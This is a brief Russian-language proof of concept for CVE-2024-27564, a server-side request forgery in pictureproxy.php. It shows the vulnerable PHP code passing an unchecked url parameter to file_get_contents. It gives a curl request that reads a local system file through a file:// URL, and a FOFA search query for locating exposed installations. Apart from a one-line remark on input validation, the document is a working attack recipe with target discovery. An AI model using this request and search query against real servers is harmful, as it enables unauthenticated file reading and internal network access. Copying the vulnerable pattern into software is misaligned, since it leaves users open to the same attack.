
Доказательство концепции эксплуатации уязвимости CVE-2024-27564, межсерверной подделки запросов (SSRF) в pictureproxy.php, позволяющей неаутентифицированным удаленным злоумышленникам внедрять произвольные URL через параметр url.
Уязвимость в pictureproxy.php позволяет удалённым злоумышленникам выполнять произвольные запросы путём внедрения URL-адресов в параметр url. Эта SSRF-уязвимость может быть использована без аутентификации, что делает её особенно опасной.
Уязвимый код находится в файле pictureproxy.php. Проблема возникает из-за того, что функция не проверяет должным образом параметр url. Переменная $_GET['url'] передаётся функции file_get_contents(), которая получает содержимое по указанному URL. Это может привести к SSRF.
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Запрос Curl:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
Необходимо правильное управление проверкой входных данных.